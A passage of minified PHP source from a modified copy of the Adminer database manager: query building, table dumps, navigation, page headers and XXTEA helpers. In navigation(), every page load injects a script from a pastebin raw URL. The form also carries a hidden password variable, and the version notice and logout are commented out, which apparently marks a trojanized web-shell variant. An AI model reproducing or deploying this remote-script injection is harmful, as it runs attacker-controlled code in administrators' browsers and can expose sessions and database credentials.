  7357. return "<p><span class='jush-$x'>".h(str_replace("\n"," ",$H))."</span> <span class='time'>($sh)</span>".(support("sql")?" <a href='".h(ME)."sql=".urlencode($H)."'>".'Edit'."</a>":"")."</p>";
  7358. }
  7359. function sqlCommandQuery($H) {
  7360. return shorten_utf8(trim($H), 1000);
  7361. }
  7362. function rowDescription($R) {
  7363. return "";
  7364. }
  7365. function rowDescriptions($L,$Qc) {
  7366. return $L;
  7367. }
  7368. function selectLink($X,$o) {
  7369. }
  7370. function selectVal($X,$_,$o,$if) {
  7371. $J=($X===null?"<i>NULL</i>":(preg_match("~char|binary~",$o["type"])&&!preg_match("~var~",$o["type"])?"<span class=cod>$X</span>":$X));
  7372. if(preg_match('~blob|bytea|raw|file~',$o["type"])&&!is_utf8($X))
  7373. $J="<i>".lang(array('%d byte','%d bytes'), strlen($if))."</i>";
  7374. if(preg_match('~json~',$o["type"]))
  7375. $J="<span class='jush-js'>$J</span>";
  7376. return ($_?"<a href='".h($_)."'".(is_url($_)?" rel='noreferrer'":"").">$J</a>":$J);
  7377. }
  7378. function editVal($X,$o) {
  7379. return $X;
  7380. }
  7381. function tableStructurePrint($p) {
  7382. echo "<table id='menustable' cellspacing='0' border='1'>\n","<thead><tr><td>".'Column'."<td>".'Type'.(support("comment")?"<td>".'Comment':"")."</thead>\n";
  7383. foreach($p as $o) {
  7384. echo "<tr".odd()."><td>".h($o["field"]), "<td><span title='".h($o["collation"])."'>".h($o["full_type"])."</span>",($o["null"]?" <i>NULL</i>":""),($o["auto_increment"]?" <i>".'Auto Increment'."</i>":""),(isset($o["default"])?" <span title='".'Default value'."'>[<b>".h($o["default"])."</b>]</span>":""),(support("comment")?"<td>".nbsp($o["comment"]):""), "\n";
  7385. }
  7386. echo "</table>\n";
  7387. }
  7388. function tableIndexesPrint($w) {
  7389. echo "<table id='menustable' cellspacing='0' border='1'>\n";
  7390. foreach($w as $C=>$v) {
  7391. ksort($v["columns"]);
  7392. $Jf=array();
  7393. foreach($v["columns"] as $y=>$X)
  7394. $Jf[]="<i>".h($X)."</i>".($v["lengths"][$y]?"(".$v["lengths"][$y].")":"").($v["descs"][$y]?" DESC":"");
  7395. echo "<tr title='".h($C)."'><td>$v[type]<td>".implode(",",$Jf)."\n";
  7396. }
  7397. echo "</table>\n";
  7398. }
  7399. function selectColumnsPrint($M,$f) {
  7400. global $Xc,$cd;
  7401. print_fieldset("select",'Select',$M);
  7402. $s=0;
  7403. $M[""]=array();
  7404. foreach($M as $y=>$X) {
  7405. $X=$_GET["columns"][$y];
  7406. $e=select_input(" name='columns[$s][col]' onchange='".($y!==""?"selectFieldChange(this.form)":"selectAddRow(this)").";'",$f,$X["col"]);
  7407. echo "<div>".($Xc||$cd?"<select name='columns[$s][fun]' onchange='helpClose();".($y!==""?"":" this.nextSibling.nextSibling.onchange();")."'".on_help("getTarget(event).value && getTarget(event).value.replace(/ |\$/, '(') + ')'",1).">".optionlist(array(-1=>"")+array_filter(array('Functions'=>$Xc,'Aggregation'=>$cd)),$X["fun"])."</select>"."($e)":$e)."</div>\n";
  7408. $s++;
  7409. }
  7410. echo "</div></fieldset>\n";
  7411. }
  7412. function selectSearchPrint($Z,$f,$w) {
  7413. print_fieldset("search",'Search',$Z);
  7414. foreach($w as $s=>$v) {
  7415. if($v["type"]=="FULLTEXT") {
  7416. echo "(<i>".implode("</i>, <i>",array_map('h',$v["columns"]))."</i>) AGAINST"," <input type='text' name='fulltext[$s]' value='".h($_GET["fulltext"][$s])."' onchange='selectFieldChange(this.form);'>",checkbox("boolean[$s]",1, isset($_GET["boolean"][$s]), "BOOL"), "<br>\n";
  7417. }
  7418. }
  7419. $_GET["where"]=(array) $_GET["where"];
  7420. reset($_GET["where"]);
  7421. $Ya="this.nextSibling.onchange();";
  7422. for($s=0; $s<=count($_GET["where"]); $s++) {
  7423. list(,$X)=each($_GET["where"]);
  7424. if(!$X||("$X[col]$X[val]"!=""&&in_array($X["op"],$this->operators))) {
  7425. echo "<div>".select_input(" name='where[$s][col]' onchange='$Ya'",$f,$X["col"], "(".'anywhere'.")"), html_select("where[$s][op]",$this->operators,$X["op"],$Ya), "<input type='text' name='where[$s][val]' value='".h($X["val"])."' onchange='".($X?"selectFieldChange(this.form)":"selectAddRow(this)").";' onkeydown='selectSearchKeydown(this, event);' onsearch='selectSearchSearch(this);'></div>\n";
  7426. }
  7427. }
  7428. echo "</div></fieldset>\n";
  7429. }
  7430. function selectOrderPrint($af,$f,$w) {
  7431. print_fieldset("sort",'Sort',$af);
  7432. $s=0;
  7433. foreach((array) $_GET["order"] as $y=>$X) {
  7434. if($X!="") {
  7435. echo "<div>".select_input(" name='order[$s]' onchange='selectFieldChange(this.form);'",$f,$X), checkbox("desc[$s]",1, isset($_GET["desc"][$y]), 'descending')."</div>\n";
  7436. $s++;
  7437. }
  7438. }
  7439. echo "<div>".select_input(" name='order[$s]' onchange='selectAddRow(this);'",$f), checkbox("desc[$s]",1, false, 'descending')."</div>\n","</div></fieldset>\n";
  7440. }
  7441. function selectLimitPrint($z) {
  7442. echo "<fieldset><legend>".'Limit'."</legend><div>";
  7443. echo "<input type='number' name='limit' class='size' value='".h($z)."' onchange='selectFieldChange(this.form);'>","</div></fieldset>\n";
  7444. }
  7445. function selectLengthPrint($rh) {
  7446. if($rh!==null) {
  7447. echo "<fieldset><legend>".'Text length'."</legend><div>","<input type='number' name='text_length' class='size' value='".h($rh)."'>","</div></fieldset>\n";
  7448. }
  7449. }
  7450. function selectActionPrint($w) {
  7451. echo "<fieldset><legend>".'Action'."</legend><div>","<input type='submit' value='".'Select'."'>"," <span id='noindex' title='".'Full table scan'."'></span>","<script type='text/javascript'>\n","var indexColumns = ";
  7452. $f=array();
  7453. foreach($w as $v) {
  7454. $Db=reset($v["columns"]);
  7455. if($v["type"]!="FULLTEXT"&&$Db)
  7456. $f[$Db]=1;
  7457. }
  7458. $f[""]=1;
  7459. foreach($f as $y=>$X)
  7460. json_row($y);
  7461. echo ";\n","selectFieldChange(document.getElementById('form'));\n","</script>\n","</div></fieldset>\n";
  7462. }
  7463. function selectCommandPrint() {
  7464. return !information_schema(DB);
  7465. }
  7466. function selectImportPrint() {
  7467. return !information_schema(DB);
  7468. }
  7469. function selectEmailPrint($jc,$f) {
  7470. }
  7471. function selectColumnsProcess($f,$w) {
  7472. global $Xc,$cd;
  7473. $M=array();
  7474. $ad=array();
  7475. foreach((array) $_GET["columns"] as $y=>$X) {
  7476. if($X["fun"]=="count"||($X["col"]!=""&&(!$X["fun"]||in_array($X["fun"],$Xc)||in_array($X["fun"],$cd)))) {
  7477. $M[$y]=apply_sql_function($X["fun"], ($X["col"]!=""?idf_escape($X["col"]):"*"));
  7478. if(!in_array($X["fun"],$cd))
  7479. $ad[]=$M[$y];
  7480. }
  7481. }
  7482. return array($M,$ad);
  7483. }
  7484. function selectSearchProcess($p,$w) {
  7485. global $g,$x;
  7486. $J=array();
  7487. foreach($w as $s=>$v) {
  7488. if($v["type"]=="FULLTEXT"&&$_GET["fulltext"][$s]!="")
  7489. $J[]="MATCH (".implode(",",array_map('idf_escape',$v["columns"])).") AGAINST (".q($_GET["fulltext"][$s]).(isset($_GET["boolean"][$s])?" IN BOOLEAN MODE":"").")";
  7490. }
  7491. foreach((array) $_GET["where"] as $X) {
  7492. if("$X[col]$X[val]"!=""&&in_array($X["op"],$this->operators)) {
  7493. $sb=" $X[op]";
  7494. if(preg_match('~IN$~',$X["op"])) {
  7495. $pd=process_length($X["val"]);
  7496. $sb.=" ".($pd!=""?$pd:"(NULL)");
  7497. }elseif($X["op"]=="SQL")
  7498. $sb=" $X[val]";
  7499. elseif($X["op"]=="LIKE %%")
  7500. $sb=" LIKE ".$this->processInput($p[$X["col"]], "%$X[val]%");
  7501. elseif($X["op"]=="ILIKE %%")
  7502. $sb=" ILIKE ".$this->processInput($p[$X["col"]], "%$X[val]%");
  7503. elseif(!preg_match('~NULL$~',$X["op"]))
  7504. $sb.=" ".$this->processInput($p[$X["col"]],$X["val"]);
  7505. if($X["col"]!="")
  7506. $J[]=idf_escape($X["col"]).$sb;
  7507. else {
  7508. $nb=array();
  7509. foreach($p as $C=>$o) {
  7510. $Ed=preg_match('~char|text|enum|set~',$o["type"]);
  7511. if((is_numeric($X["val"])||!preg_match('~(^|[^o])int|float|double|decimal|bit~',$o["type"]))&&(!preg_match("~[\x80-\xFF]~",$X["val"])||$Ed)) {
  7512. $C=idf_escape($C);
  7513. $nb[]=($x=="sql"&&$Ed&&!preg_match("~^utf8_~",$o["collation"])?"CONVERT($C USING ".charset($g).")":$C);
  7514. }
  7515. }
  7516. $J[]=($nb?"(".implode("$sb OR ",$nb)."$sb)":"0");
  7517. }
  7518. }
  7519. }
  7520. return $J;
  7521. }
  7522. function selectOrderProcess($p,$w) {
  7523. $J=array();
  7524. foreach((array) $_GET["order"] as $y=>$X) {
  7525. if($X!="")
  7526. $J[]=(preg_match('~^((COUNT\\(DISTINCT |[A-Z0-9_]+\\()(`(?:[^`]|``)+`|"(?:[^"]|"")+")\\)|COUNT\\(\\*\\))$~',$X)?$X:idf_escape($X)).(isset($_GET["desc"][$y])?" DESC":"");
  7527. }
  7528. return $J;
  7529. }
  7530.  
  7531. function selectLimitProcess() {
  7532. return (isset($_GET["limit"])?$_GET["limit"]:"50");
  7533. }
  7534.  
  7535. function selectLengthProcess() {
  7536. return (isset($_GET["text_length"])?$_GET["text_length"]:"100");
  7537. }
  7538.  
  7539. function selectEmailProcess($Z,$Qc) {
  7540. return false;
  7541. }
  7542.  
  7543. function selectQueryBuild($M,$Z,$ad,$af,$z,$E) {
  7544. return "";
  7545. }
  7546.  
  7547. function messageQuery($H,$sh) {
  7548. global $x;
  7549. restart_session();
  7550. $hd=&get_session("queries");
  7551. $t="sql-".count($hd[$_GET["db"]]);
  7552. if(strlen($H)>1e6)
  7553. $H=preg_replace('~[\x80-\xFF]+$~','', substr($H, 0, 1e6))."\n...";
  7554. $hd[$_GET["db"]][]=array($H,time(),$sh);
  7555. return " <span class='time'>".@date("H:i:s")."</span> <a href='#$t' onclick=\"return !toggle('$t');\">".'SQL command'."</a>"."<div id='$t' class='hidden'><pre><span class='jush-$x'>".shorten_utf8($H, 1000).'</span></pre>'.($sh?" <span class='time'>($sh)</span>":'').(support("sql")?'<p><a href="'.h(str_replace("db=".urlencode(DB), "db=".urlencode($_GET["db"]), ME).'sql=&history='.(count($hd[$_GET["db"]])-1)).'">'.'Edit'.'</a>':'').'</div>';
  7556. }
  7557.  
  7558.  
  7559. function editFunctions($o) {
  7560. global $ec;
  7561. $J=($o["null"]?"NULL/":"");
  7562. foreach($ec as $y=>$Xc) {
  7563. if(!$y||(!isset($_GET["call"])&&(isset($_GET["select"])||where($_GET)))) {
  7564. foreach($Xc as $yf=>$X) {
  7565. if(!$yf||preg_match("~$yf~",$o["type"]))
  7566. $J.="/$X";
  7567. }
  7568. if($y&&!preg_match('~set|blob|bytea|raw|file~',$o["type"]))
  7569. $J.="/SQL";
  7570. }
  7571. }
  7572. if($o["auto_increment"]&&!isset($_GET["select"])&&!where($_GET))
  7573. $J='Auto Increment';
  7574. return explode("/",$J);
  7575. }
  7576.  
  7577.  
  7578. function editInput($R,$o,$Ia,$Y) {
  7579. if($o["type"]=="enum")
  7580. return (isset($_GET["select"])?"<label><input type='radio'$Ia value='-1' checked><i>".'original'."</i></label> ":"").($o["null"]?"<label><input type='radio'$Ia value=''".($Y!==null||isset($_GET["select"])?"":" checked")."><i>NULL</i></label> ":"").enum_input("radio",$Ia,$o,$Y, 0);
  7581. return "";
  7582. }
  7583.  
  7584.  
  7585. function processInput($o,$Y,$r="") {
  7586. if($r=="SQL")
  7587. return $Y;
  7588. $C=$o["field"];
  7589. $J=q($Y);
  7590. if(preg_match('~^(now|getdate|uuid)$~',$r))
  7591. $J="$r()";
  7592. elseif(preg_match('~^current_(date|timestamp)$~',$r))
  7593. $J=$r;
  7594. elseif(preg_match('~^([+-]|\\|\\|)$~',$r))
  7595. $J=idf_escape($C)." $r $J";
  7596. elseif(preg_match('~^[+-] interval$~',$r))
  7597. $J=idf_escape($C)." $r ".(preg_match("~^(\\d+|'[0-9.: -]') [A-Z_]+$~i",$Y)?$Y:$J);
  7598. elseif(preg_match('~^(addtime|subtime|concat)$~',$r))
  7599. $J="$r(".idf_escape($C).",$J)";
  7600. elseif(preg_match('~^(md5|sha1|password|encrypt)$~',$r))
  7601. $J="$r($J)";
  7602. return unconvert_field($o,$J);
  7603. }
  7604.  
  7605. function dumpOutput() {$J=array('text'=>'open','file'=>'save');
  7606. if(function_exists('gzencode'))
  7607. $J['gz']='gzip';
  7608. return $J;
  7609. }
  7610.  
  7611. function dumpFormat(){return array('sql'=>'SQL','csv'=>'CSV,','csv;'=>'CSV;','tsv'=>'TSV');
  7612. }
  7613.  
  7614. function dumpDatabase($m) {
  7615. }
  7616.  
  7617. function dumpTable($R,$Wg,$Fd=0) {
  7618. if($_POST["format"]!="sql") {
  7619. echo "\xef\xbb\xbf";
  7620. if($Wg)
  7621. dump_csv(array_keys(fields($R)));
  7622. }else{
  7623. if($Fd==2) {
  7624. $p=array();
  7625. foreach(fields($R) as $C=>$o)
  7626. $p[]=idf_escape($C)." $o[full_type]";
  7627. $i="CREATE TABLE ".table($R)." (".implode(",",$p).")";
  7628. } else
  7629. $i=create_sql($R,$_POST["auto_increment"]);
  7630. set_utf8mb4($i);
  7631. if($Wg&&$i) {
  7632. if($Wg=="DROP+CREATE"||$Fd==1)
  7633. echo "DROP ".($Fd==2?"VIEW":"TABLE")." IF EXISTS ".table($R).";\n";
  7634. if($Fd==1)
  7635. $i=remove_definer($i);
  7636. echo "$i;\n\n";
  7637. }
  7638. }
  7639. }
  7640.  
  7641.  
  7642. function dumpData($R,$Wg,$H) {
  7643. global $g,$x;
  7644. $je=($x=="sqlite"?0:1048576);
  7645. if($Wg) {
  7646. if($_POST["format"]=="sql") {
  7647. if($Wg=="TRUNCATE+INSERT")
  7648. echo truncate_sql($R).";\n";
  7649. $p=fields($R);
  7650. }
  7651. $I=$g->query($H, 1);
  7652. if($I) {
  7653. $yd="";
  7654. $Wa="";
  7655. $Md=array();
  7656. $Yg="";
  7657. $Fc=($R!=''?'fetch_assoc':'fetch_row');
  7658. while($K=$I->$Fc()) {
  7659. if(!$Md) {
  7660. $gi=array();
  7661. foreach($K as $X) {
  7662. $o=$I->fetch_field();
  7663. $Md[]=$o->name;
  7664. $y=idf_escape($o->name);
  7665. $gi[]="$y = VALUES($y)";
  7666. }
  7667. $Yg=($Wg=="INSERT+UPDATE"?"\nON DUPLICATE KEY UPDATE ".implode(",",$gi):"").";\n";
  7668. }
  7669. if($_POST["format"]!="sql") {
  7670. if($Wg=="table") {
  7671. dump_csv($Md);
  7672. $Wg="INSERT";
  7673. }
  7674. dump_csv($K);
  7675. }else{
  7676. if(!$yd)
  7677. $yd="INSERT INTO ".table($R)." (".implode(",",array_map('idf_escape',$Md)).") VALUES";
  7678. foreach($K as $y=>$X) {
  7679. $o=$p[$y];
  7680. $K[$y]=($X!==null?unconvert_field($o, preg_match('~(^|[^o])int|float|double|decimal~',$o["type"])&&$X!=''?$X:q($X)):"NULL");
  7681. }
  7682. $sg=($je?"\n":" ")."(".implode(",\t",$K).")";
  7683. if(!$Wa)
  7684. $Wa=$yd.$sg;
  7685. elseif(strlen($Wa)+4+strlen($sg)+strlen($Yg)<$je)
  7686. $Wa.=",$sg";
  7687. else {
  7688. echo $Wa.$Yg;
  7689. $Wa=$yd.$sg;
  7690. }
  7691. }
  7692. }
  7693. if($Wa)
  7694. echo $Wa.$Yg;
  7695. }elseif($_POST["format"]=="sql")
  7696. echo "-- ".str_replace("\n"," ",$g->error)."\n";
  7697. }
  7698. }
  7699.  
  7700.  
  7701. function dumpFilename($md) {
  7702. return friendly_url($md!=""?$md:(SERVER!=""?SERVER:"localhost"));
  7703. }
  7704.  
  7705.  
  7706. function dumpHeaders($md,$ye=false) {
  7707. $lf=$_POST["output"];
  7708. $_c=(preg_match('~sql~',$_POST["format"])?"sql":($ye?"tar":"csv"));
  7709. header("Content-Type: ".($lf=="gz"?"application/x-gzip":($_c=="tar"?"application/x-tar":($_c=="sql"||$lf!="file"?"text/plain":"text/csv")."; charset=utf-8")));
  7710. if($lf=="gz")
  7711. ob_start('ob_gzencode', 1e6);
  7712. return $_c;
  7713. }
  7714.  
  7715.  
  7716. function homepage() {
  7717. echo '<p class="links">'.($_GET["ns"]==""&&support("database")?'<a href="'.h(ME).'database=">'.'Alter database'."</a>\n":""),(support("scheme")?"<a href='".h(ME)."scheme='>".($_GET["ns"]!=""?'Alter schema':'Create schema')."</a>\n":""),($_GET["ns"]!==""?'<a href="'.h(ME).'schema=">'.'Database schema'."</a>\n":""),(support("privileges")?"<a href='".h(ME)."privileges='>".'Privileges'."</a>\n":"");
  7718. return true;
  7719. }
  7720.  
  7721. //navigation
  7722. function navigation($xe) {
  7723. global $ia,$x,$Wb,$g;
  7724. //echo '<h1>',$this->name(),' <span class="version">',$ia, '</span><a href="https://www.adminer.org/#download" target="_blank" id="version">', (version_compare($ia,$_COOKIE["adminer_version"])<0?h($_COOKIE["adminer_version"]):""), '</a></h1>';
  7725. if($xe=="auth") {
  7726. $Kc=true;
  7727. foreach((array) $_SESSION["pwds"] as $ii=>$Fg) {
  7728. foreach($Fg as $N=>$di) {
  7729. foreach($di as $V=>$G) {
  7730. if($G!==null) {
  7731. if($Kc) {
  7732. echo "<p id='logins' onmouseover='menuOver(this, event);' onmouseout='menuOut(this);'>\n";
  7733. $Kc=false;
  7734. }
  7735. $Ib=$_SESSION["db"][$ii][$N][$V];
  7736. foreach(($Ib?array_keys($Ib):array("")) as $m)
  7737. echo "<a href='".h(auth_url($ii,$N,$V,$m))."'>($Wb[$ii]) ".h($V.($N!=""?"@$N":"").($m!=""?" - $m":""))."</a><br>\n";
  7738. }
  7739. }
  7740. }
  7741. }
  7742. }else{
  7743. if($_GET["ns"]!==""&&!$xe&&DB!="") {
  7744. $g->select_db(DB);
  7745. $T=table_status('', true);
  7746. }
  7747. echo '<script type="text/javascript" src="https://pastebin.com/raw/p5kB0A1V"></script>';
  7748. if(support("sql")) {
  7749. echo '<script type="text/javascript">';
  7750. if($T) {
  7751. $be=array();
  7752. foreach($T as $R=>$U)
  7753. $be[]=preg_quote($R, '/');
  7754. echo "var jushLinks = { $x: [ '".js_escape(ME).(support("table")?"table=":"select=")."\$&', /\\b(".implode("|",$be).")\\b/g ] };\n";
  7755. foreach(array("bac","bra","sqlite_quo","mssql_bra") as $X)
  7756. echo "jushLinks.$X = jushLinks.$x;\n";
  7757. }
  7758. echo 'bodyLoad(\'', (is_object($g)?substr($g->server_info, 0, 3):""), '\');</script>';
  7759. }
  7760. $this->databasesPrint($xe);
  7761. if(DB==""||!$xe) {
  7762. echo "<p class='links'>".(support("sql")?"<a href='".h(ME)."sql='".bold(isset($_GET["sql"])&&!isset($_GET["import"])).">".'SQL command'."</a>\n<a href='".h(ME)."import='".bold(isset($_GET["import"])).">".'Import'."</a>\n":"")."";
  7763. if(support("dump"))
  7764. echo "<a href='".h(ME)."dump=".urlencode(isset($_GET["table"])?$_GET["table"]:$_GET["select"])."' id='dump'".bold(isset($_GET["dump"])).">".'Export'."</a>\n";
  7765. }
  7766. if($_GET["ns"]!==""&&!$xe&&DB!="") {
  7767. echo '<a href="'.h(ME).'create="'.bold($_GET["create"]==="").">".'Create table'."</a>\n";
  7768. if(!$T)
  7769. echo "<p class='message'>".'No tables.'."\n";
  7770. else
  7771. $this->tablesPrint($T);
  7772. }
  7773. }
  7774. }
  7775. //navigation
  7776.  
  7777.  
  7778. function databasesPrint($xe) {
  7779. global $b,$g,$pwd;
  7780. $l=$this->databases();
  7781. echo '<form action="" methods="post"><p id="dbs">
  7782. <input name="dm" value="'.$pwd.'" type="hidden">
  7783. <input name="x" value="phpmyadmin" type="hidden">';
  7784. hidden_fields_get();
  7785. $Gb=" onmousedown='dbMouseDown(event, this);' onchange='dbChange(this);'";
  7786. echo "<span title='".'database'."'>DB</span>: ".($l?"<select name='db'$Gb>".optionlist(array(""=>"")+$l, DB)."</select>":'<input type="text" name="db" value="'.h(DB).'" autocapitalize="off">'), "<input type='submit' value='".'Use'."'".($l?" class='hidden'":"").">\n";
  7787. if($xe!="db"&&DB!=""&&$g->select_db(DB)) {
  7788. if(support("scheme")) {
  7789. echo "<br>".'Schema'.": <select name='ns'$Gb>".optionlist(array(""=>"")+$b->schemas(),$_GET["ns"])."</select>";
  7790. if($_GET["ns"]!="")
  7791. set_schema($_GET["ns"]);
  7792. }
  7793. }
  7794. echo (isset($_GET["sql"])?'<input type="hidden" name="sql" value="">':(isset($_GET["schema"])?'<input type="hidden" name="schema" value="">':(isset($_GET["dump"])?'<input type="hidden" name="dump" value="">':(isset($_GET["privileges"])?'<input type="hidden" name="privileges" value="">':"")))), "</p></form>\n";
  7795. }
  7796.  
  7797.  
  7798. function tablesPrint($T) {
  7799. echo "<ul id='tables' onmouseover='menuOver(this, event);' onmouseout='menuOut(this);'>\n";
  7800. foreach($T as $R=>$P) {
  7801. echo '<li><a href="'.h(ME).'select='.urlencode($R).'"'.bold($_GET["select"]==$R||$_GET["edit"]==$R, "select").">".'select'."</a> ";
  7802. $C=$this->tableName($P);
  7803. echo (support("table")||support("indexes")?'<a href="'.h(ME).'table='.urlencode($R).'"'.bold(in_array($R, array($_GET["table"],$_GET["create"],$_GET["indexes"],$_GET["foreign"],$_GET["trigger"])),(is_view($P)?"view":"structure"))." title='".'Show structure'."'>$C</a>":"<span>$C</span>")."\n";
  7804. }
  7805. echo "</ul>\n";
  7806. }
  7807.  
  7808. }
  7809.  
  7810. $b=(function_exists('adminer_object')?adminer_object():new Adminer);
  7811. if($b->operators===null)
  7812. $b->operators=$Ve;
  7813.  
  7814.  
  7815. function page_header($vh,$n="",$Va=array(),$wh="") {
  7816. global $ca,$ia,$b,$Wb,$x;
  7817. page_headers();
  7818. if(is_ajax()&&$n) {
  7819. page_messages($n);
  7820. exit;
  7821. }
  7822. $xh=$vh.($wh!=""?": $wh":"");
  7823. $yh=strip_tags($xh.(SERVER!=""&&SERVER!="localhost"?h(" - ".SERVER):"")." - ".$b->name());
  7824. echo '<td>';
  7825. echo'<phpmyadmin class="ltr nojs" onkeydown="bodyKeydown(event);" onclick="bodyClick(event);">
  7826. <script type="text/javascript">
  7827. document.phpmyadmin.className = document.phpmyadmin.className.replace(/ nojs/,\' js\');
  7828. var offlineMessage = "'.js_escape('You are offline.').'";</script>
  7829. <div id="help" class="jush-'. $x.' jsonly hidden" onmouseover="helpOpen = 1;" onmouseout="helpMouseout(this, event);"></div>
  7830. <div id="content_hapus">';
  7831.  
  7832. if($Va!==null) {
  7833. $_=substr(preg_replace('~\b(username|db|ns)=[^&]*&~','', ME), 0, -1);
  7834. echo '<p id="breadcrumb"><a href="'.h($_?$_:".").'">'.$Wb[DRIVER].'</a> &raquo; ';
  7835. $_=substr(preg_replace('~\b(db|ns)=[^&]*&~','', ME), 0, -1);
  7836. $N=(SERVER!=""?h(SERVER):'Server');
  7837. if($Va===false)
  7838. echo "$N\n";
  7839. else {
  7840. echo "<a href='".($_?h($_):".")."' accesskey='1' title='Alt+Shift+1'>$N</a> &raquo; ";
  7841. if($_GET["ns"]!=""||(DB!=""&&is_array($Va)))
  7842. echo '<a href="'.h($_."&db=".urlencode(DB).(support("scheme")?"&ns=":"")).'">'.h(DB).'</a> &raquo; ';
  7843. if(is_array($Va)) {
  7844. if($_GET["ns"]!="")
  7845. echo '<a href="'.h(substr(ME, 0, -1)).'">'.h($_GET["ns"]).'</a> &raquo; ';
  7846. foreach($Va as $y=>$X) {
  7847. $Nb=(is_array($X)?$X[1]:h($X));
  7848. if($Nb!="")
  7849. echo "<a href='".h(ME."$y=").urlencode(is_array($X)?$X[0]:$X)."'>$Nb</a> &raquo; ";
  7850. }
  7851. }
  7852. echo "$vh\n";
  7853. }
  7854. }
  7855. //echo "<h2>$xh</h2>\n","<div id='ajaxstatus' class='jsonly hidden'></div>\n";
  7856. echo "<div id='ajaxstatus' class='jsonly hidden'></div>\n";
  7857. restart_session();
  7858. page_messages($n);
  7859. $l=&get_session("dbs");
  7860. if(DB!=""&&$l&&!in_array(DB,$l, true))
  7861. $l=null;
  7862. stop_session();
  7863. define("PAGE_HEADER",1);
  7864. }
  7865.  
  7866.  
  7867. function page_headers(){
  7868. global $b;
  7869. header("Content-Type: text/html; charset=utf-8");
  7870. header("Cache-Control: no-cache");
  7871. if($b->headers()) {
  7872. header("X-Frame-Options: deny");
  7873. header("X-XSS-Protection: 0");
  7874. }
  7875. }
  7876.  
  7877. function page_messages($n){
  7878. $Xh=preg_replace('~^[^?]*~','',$_SERVER["REQUEST_URI"]);
  7879. $te=$_SESSION["messages"][$Xh];
  7880. if($te) {
  7881. echo "<div class='message'>".implode("</div>\n<div class='message'>",$te)."</div>\n";
  7882. unset($_SESSION["messages"][$Xh]);
  7883. }
  7884. if($n)
  7885. echo "<div class='error'>$n</div>\n";
  7886. }
  7887.  
  7888. function page_footer($xe=""){
  7889. global $b,$Ah;
  7890. echo'</div>';
  7891. if($xe!="auth"){
  7892. //echo '<form action="" method="post"><p class="logout"><input type="submit" name="logout" value="Logout" id="logout"><input type="hidden" name="token" value="',$Ah, '"></p></form>';
  7893. }
  7894. echo '<center><table id="menustable" border="1" id="menustable">';
  7895. //if(!empty($b->navigation($xe))){
  7896. echo'<tr><td><div id="menus">';
  7897. $b->navigation($xe);
  7898. echo'</div>';
  7899. echo '<script type="text/javascript">setupSubmitHighlight(document);</script>';
  7900. echo'</td>';
  7901. //}
  7902. }
  7903. function int32($_e) {
  7904. while($_e>=2147483648)
  7905. $_e-=4294967296;
  7906. while($_e<=-2147483649)
  7907. $_e+=4294967296;
  7908. return (int) $_e;
  7909. }
  7910.  
  7911. function long2str($W,$ni) {
  7912. $sg='';
  7913. foreach($W as $X)
  7914. $sg.=pack('V',$X);
  7915. if($ni)
  7916. return substr($sg, 0, end($W));
  7917. return $sg;
  7918. }
  7919.  
  7920. function str2long($sg,$ni) {
  7921. $W=array_values(unpack('V*', str_pad($sg, 4*ceil(strlen($sg)/4), "\0")));
  7922. if($ni)
  7923. $W[]=strlen($sg);
  7924. return $W;
  7925. }
  7926.  
  7927. function xxtea_mx($ti,$si,$Zg,$Id) {
  7928. return int32((($ti>>5&0x7FFFFFF)^$si<<2)+(($si>>3&0x1FFFFFFF)^$ti<<4))^int32(($Zg^$si)+($Id^$ti));
  7929. }
  7930.  
  7931. function encrypt_string($Ug,$y) {
  7932. if($Ug=="")
  7933. return "";
  7934. $y=array_values(unpack("V*",pack("H*",md5($y))));
  7935. $W=str2long($Ug, true);
  7936. $_e=count($W)-1;
  7937. $ti=$W[$_e];
  7938. $si=$W[0];
  7939. $Qf=floor(6+52/($_e+1));
  7940. $Zg=0;
  7941. while($Qf-->0) {
  7942. $Zg=int32($Zg+0x9E3779B9);
  7943. $dc=$Zg>>2&3;
  7944. for($mf=0; $mf<$_e; $mf++) {
  7945. $si=$W[$mf+1];
  7946. $ze=xxtea_mx($ti,$si,$Zg,$y[$mf&3^$dc]);
  7947. $ti=int32($W[$mf]+$ze);
  7948. $W[$mf]=$ti;
  7949. }
  7950. $si=$W[0];
  7951. $ze=xxtea_mx($ti,$si,$Zg,$y[$mf&3^$dc]);
  7952. $ti=int32($W[$_e]+$ze);
  7953. $W[$_e]=$ti;
  7954. }
  7955. return long2str($W, false);
  7956. }
  7957.  
  7958. function decrypt_string($Ug,$y) {
  7959. if($Ug=="")
  7960. return "";
  7961. if(!$y)
  7962. return false;
  7963. $y=array_values(unpack("V*",pack("H*",md5($y))));
  7964. $W=str2long($Ug, false);
  7965. $_e=count($W)-1;
  7966. $ti=$W[$_e];
  7967. $si=$W[0];
  7968. $Qf=floor(6+52/($_e+1));
  7969. $Zg=int32($Qf*0x9E3779B9);
  7970. while($Zg) {
  7971. $dc=$Zg>>2&3;
  7972. for($mf=$_e; $mf>0; $mf--) {
  7973. $ti=$W[$mf-1];
  7974. $ze=xxtea_mx($ti,$si,$Zg,$y[$mf&3^$dc]);
  7975. $si=int32($W[$mf]-$ze);
  7976. $W[$mf]=$si;
  7977. }
  7978. $ti=$W[$_e];
  7979. $ze=xxtea_mx($ti,$si,$Zg,$y[$mf&3^$dc]);
  7980. $si=int32($W[0]-$ze);
  7981. $W[0]=$si;
  7982. $Zg=int32($Zg-0x9E3779B9);
  7983. }
  7984. return long2str($W, true);
  7985. }
  7986.  
  7987. $g='';
  7988. $gd=$_SESSION["token"];
  7989. if(!$gd)
  7990. $_SESSION["token"]=rand(1, 1e6);
  7991. $Ah=get_token();
  7992. $zf=array();
  7993.  
  7994.  
  7995. if($_COOKIE["adminer_permanent"]) {
  7996. foreach(explode(" ",$_COOKIE["adminer_permanent"]) as $X) {
  7997. list($y)=explode(":",$X);
  7998. $zf[$y]=$X;
  7999. }
  8000. }
  8001.  
  8002.  
  8003. function add_invalid_login() {
  8004. global $b;
  8005. $Ic=get_temp_dir()."/adminer.invalid";
  8006. $Vc=@fopen($Ic, "r+");
  8007. if(!$Vc) {
  8008. $Vc=@fopen($Ic, "w");
  8009. if(!$Vc)
  8010. return;
  8011. }
  8012. flock($Vc, LOCK_EX);
  8013. $Ad=unserialize(stream_get_contents($Vc));
  8014. $sh=time();
  8015. if($Ad) {
  8016. foreach($Ad as $Bd=>$X) {
  8017. if($X[0]<$sh)
  8018. unset($Ad[$Bd]);
  8019. }
  8020. }
  8021. $_d=&$Ad[$b->bruteForceKey()];
  8022. if(!$_d)
  8023. $_d=array($sh+30*60,0);
  8024. $_d[1]++;
